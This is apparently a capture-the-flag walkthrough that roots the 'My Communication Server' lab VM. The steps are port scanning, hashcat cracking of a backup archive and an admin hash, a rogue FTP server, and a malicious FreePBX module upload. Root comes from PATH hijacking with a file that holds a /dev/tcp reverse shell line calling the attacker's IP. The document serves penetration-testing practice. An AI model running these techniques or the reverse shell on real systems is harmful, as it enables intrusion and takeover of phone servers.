Today we are going to solve the “My Communication Server”.
You can download the machine from the given link.
One thing you want to remember that there’s no need to brute-forcing any services and also not to exploit the kernel of the target.
Goal: Get the root flag of the target.
Difficulty: Hard/Challenging Level
Note: Set MAC Address of your network interface 080027E148F2
Before starting the machine I’ll suggest you read the Description of the machine.
Okay so let’s quickly set up the machine.
Lab Setup:-
Download this machine from the link and import it into the virtual box.
Network Mode: Bridge Adapter
Reconnaissance:-
Let’s run the simple Nmap command to find the live IP in the network.
┌──(danial㉿kali)-[~/Desktop/vulnhub/My_Communication_Server]
└─$ nmap 192.168.1.1/24
My machine IP is 192.168.1.107
let’s check the all ports and services running on that.
┌──(danial㉿kali)-[~/Desktop/vulnhub/My_Communication_Server]
└─$ nmap -sV -sC -A -vv -oA nmap -p- 192.168.1.107
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-17 15:24 +0530
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:24
Completed NSE at 15:24, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:24
Completed NSE at 15:24, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:24
Completed NSE at 15:24, 0.00s elapsed
Initiating Ping Scan at 15:24
Scanning 192.168.1.107 [2 ports]
Completed Ping Scan at 15:24, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:24
Completed Parallel DNS resolution of 1 host. at 15:24, 0.05s elapsed
Initiating Connect Scan at 15:24
Scanning 192.168.1.107 [65535 ports]
Discovered open port 80/tcp on 192.168.1.107
Discovered open port 53/tcp on 192.168.1.107
Discovered open port 443/tcp on 192.168.1.107
Discovered open port 22/tcp on 192.168.1.107
Discovered open port 8088/tcp on 192.168.1.107
Discovered open port 5038/tcp on 192.168.1.107
Discovered open port 8089/tcp on 192.168.1.107
Completed Connect Scan at 15:24, 3.74s elapsed (65535 total ports)
Initiating Service scan at 15:24
Scanning 7 services on 192.168.1.107
Completed Service scan at 15:24, 24.60s elapsed (7 services on 1 host)
NSE: Script scanning 192.168.1.107.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:24
Completed NSE at 15:25, 5.06s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:25
Completed NSE at 15:25, 0.09s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:25
Completed NSE at 15:25, 0.00s elapsed
Nmap scan report for 192.168.1.107
Host is up, received syn-ack (0.0067s latency).
Scanned at 2021-04-17 15:24:27 +0530 for 33s
Not shown: 65528 closed ports
Reason: 65528 conn-refused
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 5.3 (protocol 2.0)
| ssh-hostkey:
| 1024 df:ba:c4:5c:5b:6a:ca:b9:f9:94:3a:99:30:5b:33:57 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAPxiHD/EYYR4uXRvCugiQSu07HLODqJ5tYcIu4v4TTXqlemGFgiqd5Kuk5W39ZjZqiIU2hHv3T3jpNEwpFC0PzJCX/3+h/Zc6LSmUc/giOl1aHio/l89czi2z0h9xV1sjpJDfuEuDOtMMTTW3edtdBREKI+U4jYCXALXiXV8kR0zAAAAFQCPFxCIXXuqxGmJ20XzOw7NK1xGDwAAAIBDePp25mwzFOE2pZvlXHLLZRGgBfUMZLzQce+12i6vVYSKHAU8iQ1hIdTqWwqJ/PgvblF6zdIi5Rjl9GZq/w91u4EGFmTLfnhsC0eAkp5QxlsV51C14woGSBmiMQ2KZDRX9rbYEX9hpUER+y0d7N+QRWllWTJn7YnLI64eTttuJwAAAIEAw7rFSszOZfb4JT6SQ+82lFW5twfADaHmU9AfVvI+ezVWF3h8ilm3pfEcRFzC2hNoc/uCfOyv/pj2TlXU13uyG5LUI8xybOckuHaEZya5Py7TTdVtdURvwAe6c8KMu7L8Hs+SogaajRjwIuqM3EaHjGnu5NOzzSy3J2OAAaVb+Pg=
| 2048 b9:08:e5:32:8a:56:ca:0a:1a:1c:e7:d7:9f:07:92:31 (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxbXekY/kqaYSwfLKTv41g2l+0+U6/umMXHDoWqaN9yhvbPsAGnjkHXfTfzJf2bt1X6AlKBK/ciSg4Sg/Uk7OSYXf6oK3U4Lql0cHul1WI+XPgUtvGBclcYN87+AXpApMJKIjP8Sbin3KVYsLGdvB/BP5S0C7ivESQOdLWyIZu1hOIRi8eXLtt3fdFK1sKXVK3XR0KEfeQmWt23S4q9e+XQA6/dB5L1RWA09I7BlLQGrKV0hvHrBOJ/ZhxxA7AvGNpVP2BfldCBmzk3k/CkCJebDw375kRHH0Nu7eWVgbzc12g1972+E0+a97kjQO2LVcmbOFr+2KdC0PJQ3V7UBRTw==
53/tcp open tcpwrapped syn-ack
80/tcp open http syn-ack Apache httpd 2.2.15 ((CentOS))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 2 disallowed entries
|_/ /backup.7z
|_http-server-header: Apache/2.2.15 (CentOS)
| http-title: 404 Not Found
|_Requested resource was config.php
443/tcp open ssl/https? syn-ack
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/emailAddress=root@localhost.localdomain/organizationalUnitName=SomeOrganizationalUnit/localityName=SomeCity
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/emailAddress=root@localhost.localdomain/organizationalUnitName=SomeOrganizationalUnit/localityName=SomeCity
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2020-03-23T16:30:17
| Not valid after: 2021-03-23T16:30:17
| MD5: f4bf a335 3e11 6420 c896 25b5 a865 1230
| SHA-1: 02d1 5f78 6b1c e378 5486 50eb a6f2 7a4b e326 7491
| -----BEGIN CERTIFICATE-----
| MIIDPzCCAqigAwIBAgICWQwwDQYJKoZIhvcNAQEFBQAwgbsxCzAJBgNVBAYTAi0t
| MRIwEAYDVQQIDAlTb21lU3RhdGUxETAPBgNVBAcMCFNvbWVDaXR5MRkwFwYDVQQK
| DBBTb21lT3JnYW5pemF0aW9uMR8wHQYDVQQLDBZTb21lT3JnYW5pemF0aW9uYWxV
| bml0MR4wHAYDVQQDDBVsb2NhbGhvc3QubG9jYWxkb21haW4xKTAnBgkqhkiG9w0B
| CQEWGnJvb3RAbG9jYWxob3N0LmxvY2FsZG9tYWluMB4XDTIwMDMyMzE2MzAxN1oX
| DTIxMDMyMzE2MzAxN1owgbsxCzAJBgNVBAYTAi0tMRIwEAYDVQQIDAlTb21lU3Rh
| dGUxETAPBgNVBAcMCFNvbWVDaXR5MRkwFwYDVQQKDBBTb21lT3JnYW5pemF0aW9u
| MR8wHQYDVQQLDBZTb21lT3JnYW5pemF0aW9uYWxVbml0MR4wHAYDVQQDDBVsb2Nh
| bGhvc3QubG9jYWxkb21haW4xKTAnBgkqhkiG9w0BCQEWGnJvb3RAbG9jYWxob3N0
| LmxvY2FsZG9tYWluMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDAgnv+BNr+
| HT519DUKSSbVCIzN/g+EF8/dr98MO7PUqIXLGWfKoPxhbE9X9rDgiwwWK7SmTeIk
| 6OLiEDnYBfUvAmmk1RHV1akOZsVScWPz6VeGMO3aFe5xsbQ65bEC8m+26C0/mPwT
| C2GsBFOaaO6UWo0KXmN/8vhbwiNOmZW8HQIDAQABo1AwTjAdBgNVHQ4EFgQU/b2A
| AF+/utPPK71Tyz7II0iiZ7gwHwYDVR0jBBgwFoAU/b2AAF+/utPPK71Tyz7II0ii
| Z7gwDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQUFAAOBgQC5VGJK+/GoWwvpnztY
| 6vqdiZJS7ymzd0evuVQfGtetgLIvF7Vd2mPFdugkTtq/eTpCUxFvd9h8KHYGU+HD
| ZhfplkhRv+XA8prFWVOvxecrC0OiYDlindvNomCfJcpmYu5RE1ad+mMhpDsazVi6
| JeF6IbC9PRpgmWdZZMQGVK1sVA==
|_-----END CERTIFICATE-----
|_ssl-date: 2021-04-17T09:55:00+00:00; 0s from scanner time.
5038/tcp open asterisk syn-ack Asterisk Call Manager 2.10.0
8088/tcp open http syn-ack Asterisk 13.17.0
|_http-server-header: Asterisk/13.17.0
|_http-title: 404 Not Found
8089/tcp open ssl/http syn-ack Asterisk 13.17.0
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=localhost.localdomain
| Issuer: commonName=localhost.localdomain/organizationName=localhost.localdomain
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-03-23T16:28:55
| Not valid after: 2030-03-21T16:28:55
| MD5: 91bd 0f13 17a1 4729 b095 daae a5f6 a6f8
| SHA-1: 4fc7 5b35 f399 3849 ed2d f963 4ade 735d 1525 5169
| -----BEGIN CERTIFICATE-----
| MIIDcDCCAVgCAQEwDQYJKoZIhvcNAQELBQAwQDEeMBwGA1UEAxMVbG9jYWxob3N0
| LmxvY2FsZG9tYWluMR4wHAYDVQQKExVsb2NhbGhvc3QubG9jYWxkb21haW4wHhcN
| MjAwMzIzMTYyODU1WhcNMzAwMzIxMTYyODU1WjBAMR4wHAYDVQQDExVsb2NhbGhv
| c3QubG9jYWxkb21haW4xHjAcBgNVBAoTFWxvY2FsaG9zdC5sb2NhbGRvbWFpbjCB
| nzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAt5VTnfM9L+eC3uUN/IaW6U5ny9c1
| TgnJmSgNrNYIxsS08EbXB04KhgEJzxa0OcTcsCXpL8ritY+cok+k2t4/gPpsOlLY
| ADOUoMECFru8d2JMjrlmoKjWM4SZ1v4PiQgB+gXxlq6iK/JDMtBcl9m3brWeurwl
| 5uPOfiulWi14GcECAwEAATANBgkqhkiG9w0BAQsFAAOCAgEAn8QZsKTERGzZw5Mm
| Hpr0KMQmFYgdRbfYEeuv5f8TG9pEe+LAaAAdFlg3erMGMLxyVHMxL524FuLMLl9T
| Z6UA++vvuct3QdptTkTbnTR65ZXRThQbGF5yxjzhOyQz1NoqkxWOEZYQ4+9Js3Zg
| KgkL89NlQs6jZafDrEJghh7UTDtaRFysSSLftyUkWYbSfJ1+FoPqDtx+syJH6frC
| mZU5V7S7545B5xIYnRSFcCNQeUhEIk8YMRggrkEv2p1J8KFW9qKnwqcY1qqoLQP8
| hWNrNw4NU4qqSSTn4jha1uejAbMGDXE6Z2JJ0lNTYznPVsWBZKILPxD5FbLpSXqx
| ICqa7udSO3Om1G/AterL0EdemRmNPCrMTeIBXzeSSBvk6thP/DVRc+zbVOdi7pBc
| hhRQzotHxAx6bzouXtSaT1m/+8N+Nk1Xojo/glOQtVCuFJG8ALMUNQvuFzgUU5if
| GDM3I+OiF3pmr8Tjj4bWAsIHf1u5zmjIAZ2iqrrMEucQTxjBOXywdmTmF/LTWJbT
| Ww8AFBjmfuL41/RVsOlnO7hqE0W4swNwZ4eCWZfggyv+jHp6WdogFBFSbAl/6LjK
| u0/ZhjCGP/HOuSFGXUpngE5tll0NzVIyZvoDPeT0BmjubVlBYDaGL9/rzY49wwWI
| NftuGgVzVOl9C1guQTCU3NvAqxw=
|_-----END CERTIFICATE-----
|_ssl-date: 2021-04-17T09:55:00+00:00; 0s from scanner time.
Service Info: Device: PBXFound multiple open ports of the machine, Also found “backup.7z” entry in robots.txt.
So let’s move forward with Port 80.
FreePBX 13.0.192.16 is running Not Vulnerable, in the robot.txt we got the backup.7z file.
Let’s download this file,
But the file is asking for a password. no worry we have tools to crack the 7z password.
I’m using 7z2john to generate a hash and will use these hash to crack the password on Hashcat.
But before using this hash you have to remove the file name before the hash.
┌──(danial㉿kali)-[~/Desktop/vulnhub/My_Communication_Server]
└─$ hashcat -m 11600 -a 0 hash.txt /usr/share/wordlists/rockyou.txt --show
$7z$0$19$0$$8$58923268f4b4205f0000000000000000$4287154581$128$114$58f6426ffdb91b40901c318aae5b4b768dac4b03ff2f371031ff35bc501a806f840e0afe8083802f2fbf765d9dc273ef25975fe92a75aea3a80a06aec69f47c4bab68ac30c76d176c068fd420176e41445510e9d1bc8319c599645b33f4af8e705b5768eb2845ec1a6589573cbca2765ba37043e7731f22a3fc8a1a0995cac01:r*****3After 1 hour finally got the password.
After extracting this 7z file got some interesting info.
┌──(danial㉿kali)-[~/Desktop/vulnhub/My_Communication_Server]
└─$ cat my_back.txt
Hi User
server backup send to ftp server
ftp_server=192.168.56.1
ftp_port=21
ftp_user=a****r
ftp_password=a****rBut!!!
The challenging part is that server sends backup to a different network,
So let’s switch the network of machine.
From Bridge Adapter to Host Only Adapter
But now we have to do one more thing, According to the credentials we have to start the server on a gateway that is Attacker PC.
So let’s Quickly configure the FTP server on your system with the given credentials.
I’m using the python FTP server because it is quite easy and doesn’t take much time to set up.
Let’s make a directory with the name of ftp and change the owner and group of the directory.
And run your ftp server.
This file I’m using for the python FTP server.
After 1 min of running the FTP server got one backup file.
After extracting some file got the SHA1 Hash. but this time again we have to use hashcat to crack the password.
After some time got the password of the admin, Let’s upload the shell quickly.
6d72a*************************6c9425931a:f******1
For uploading a shell, Create an install.php file and module.xml file. in the install.php file, you have to add your reverse shellcode.
Admin > Module Admin >> Upload Modules >> Locate compressed file
module.xml
<module>
<rawname>shell</rawname>
<name>shell</name>
<repo>standard</repo>
<type>setup</type>
<category>Admin</category>
<publisher>Sam Sepiol Proxy</publisher> <license>GPL</license> <description>shell</description> <licenselink>http://www.gnu.org/licenses/gpl-2.0.txt</licenselink> </module>After this Enable module from here.
Admin >> Module Admin >> Locate your shell >> install >> process >> confirm (start listner)Or you can follow this GitHub repo to upload a shell.
https://github.com/SamSepiolProxy/FreePBX-Reverse-Shell-Module
Now got a shell.
After enumerating some time got one *.sh file and we can use the reboot command as a superuser.
Now it’s time to root, I’m moving forward with the reboot command using the PATH variable.
bash-4.1$ cd /tmp; pwd
/tmp
bash-4.1$ echo "bash -i >& /dev/tcp/192.168.56.1/1111 0>&1" > reboot
bash-4.1$ cat reboot
bash -i >& /dev/tcp/192.168.56.1/1111 0>&1
bash-4.1$ chmod +x reboot
bash-4.1$ ls -lh reboot
-rwxrwxrwx 1 asterisk asterisk 43 Apr 17 12:52 reboot
bash-4.1$ echo $PATH
/sbin:/usr/sbin:/bin:/usr/bin
bash-4.1$ export PATH=/tmp:$PATH
bash-4.1$ echo $PATH
/tmp:/sbin:/usr/sbin:/bin:/usr/binNow check if our reboot command is sending the reverse shell or not from the current location.
After exporting the path whole thing is under your nose, enumerate and got the gem.
Boom !!! Finally Got a Root.
Happy Hacking !!
